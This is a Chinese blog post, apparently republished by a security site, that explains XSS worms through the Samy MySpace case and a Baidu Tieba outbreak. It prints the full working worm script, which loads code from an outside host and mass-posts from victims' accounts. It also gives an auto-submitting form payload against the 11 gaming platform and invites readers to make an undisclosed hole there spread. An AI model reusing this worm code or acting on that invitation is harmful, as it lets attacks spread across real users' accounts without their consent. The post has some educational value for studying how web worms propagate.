—————————————————————————————————————————-
老规矩,先说说废话~昨天和余弦大牛聊天,好像造成一个形象,我是一个良好少年,哈哈,好吧,被余弦大牛在文章中表扬,我还是感觉挺高兴的,也有点小骄傲,我还完全是小孩儿心性啊,哈哈文章链接在这儿:http://www.dwz.cn/8fI9a昨天还有一事儿,就是百度贴吧爆发了一次xss 蠕虫,这个虫子几乎把整个贴吧都爬了一遍,xss worm,到底是一个什么样的技术?今天就乘着度娘爆发的小虫子,看看xss worm的前世今生
———————————————————–worm来了~——————————————————————————
0×01世界上的第一条xss 虫子
在2005年10月初,第一只Web 2.0蠕虫I-Worm/JS.Sammy也是利用著名网络社区MySpace.com的系统漏洞,以跨站脚本攻击(XSS)的方式进行传播的Sammy 蠕虫的作者在社区个人资料中插入病毒脚本,当其他MySpace.com用户查看他的资料时,病毒脚本就会运行,自动把病毒作者加为好友,同时病毒本身也 会被复制到浏览者的个人资料里面。不到20个小时,就有超过100万MySpace.com用户受到感染,造成网站一度瘫痪。MySpace.com为此 不得不禁止所有用户在个人资料中加入任何脚本程序。
0×02度娘的worm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
var forumName = [];
var forumId = [];
for (var i = 0, j = 0; i < PageData.user.user_forum_list.info.length; i++) { if (PageData.user.user_forum_list.info.user_level > 3) {
if (PageData.user.user_forum_list.info.forum_name!=”璐村惂鐩戞帶”) {
forumName[j] = PageData.user.user_forum_list.info.forum_name;
forumId[j] = PageData.user.user_forum_list.info.id;
j++;
}
}
}
function madeit(myKw, myFid) {
var c = rich_postor._getData();
c.content=”u8bf7u5141u8bb8u6211u505au4e00u4e2au5fe7u4f24u7684u8868u60c5uff0cu662fu5fe7u4f24u54e6uff01″;
c.ftid = c.fid;
c.ptid = “2337372175″;
c.title = ‘u70b9u8fdbu6765u6709..”,a:$.getScript(’//xss.retaker.me/1.js’),a:”‘;
c.fid = myFid;
c.kw = myKw;
$.post(“/relay/commit”, c);
}
//now begin!
for (j = 0; j < forumName.length; j++) {
setTimeout(“madeit(‘” + forumName[j] + “‘,’” + forumId[j] + “‘)”, 1500 * j);
}
|
这就是昨天造成那个虫子的脚本,度娘响应还是快的,删贴神马的,不过最终停止是这个第三方js失效,下图是我昨天的截图
可以看到,影响蛮大的,这个虫子的行为是:一个用户中招后,就会在所有该用户收藏的贴吧中发帖,其传播速度可想而知了
第三方js的地址为:http://xss.retaker.me/1.js(现已失效 请勿手贱)
在爆发时有个临时解决方案,即:在C:WindowsSystem32driversetchosts用记事本打开,添加127.0.0.1 xss.retaker.me
其实更觉得这位小哥像是在测试,然后就一不小心爆发了。。。(好吧,我还是太善良了)
除了本次事件外,在08年的度娘也爆发过一次
0×03 11平台的虫子
其实也不算是真正的xss worm,只是传播类似,好像是去年我才开学吧,我当时才学习前端安全不久(一直玩渗透,前端安全也是当工具用~)新浪微博好像是就挖出一个潜在的虫子,是个持久性的xss,在个人设置中个人资料填写存在持久性xss,当鼠标停留在用户id时,即触发xss攻击
写一个post请求
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
<form accept-charset=“utf-8″ name=“form” method=“post” action=“http://i.5211game.com/request/” target=“_self” >
<input name=“method” type=“text” value=“publish”>
<input name=“tag” type=“text” value=“”>
<input name=“pic” type=“text” value=“”>
<input name=“content” value=“么么哒~@测试id”>
<input name=“tx” type=“text” value=“0″>
<input name=“sina” type=“text” value=“0″>
<input name=“lastId” type=“text” value=“2522856″>
<input name=“oldId” type=“text” value=“2514419″>
<input name=“lasttime” type=“text” value=“1343530565579″>
<input name=“tp” type=“text” value=“phrase”>
<input name=“submit” type=“image” src=“http://www.91ri.org/” value=“11111″/>
</form>
<scripttype=“text/javascript”>
document.form.submit();
</script>
|
行为如下:
自动提交post,只要有其他用户在11社区鼠标停留到该测试id,即触发
比较操蛋的是当时小规模测试成了,然后本来想留着多玩两天的,被wooyun的一个同学提交了,我擦。。。
0×04 小福利,应该是没公开的小漏洞奉上
这个洞也是我找的,也是11平台(哈哈,我喜欢打dota),不过这个洞的位置在发布私信处,指哪儿打哪儿啊
如果有兴趣的话可以尝试蠕动,具体可参考渣浪微博的worm爆发
———————————————————-我是菜逼的分割线——————————————————
好吧,差不多写了这些。。。讲的不好,我也就自己娱乐娱乐,重在科普
同类文章参考:《搜房网微博蠕虫实现与思路》 《当XSS蠕虫与QQ系统消息推送双剑合璧之后…》
link:http://www.fuckgcd.net/wordpress/archives/136
本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号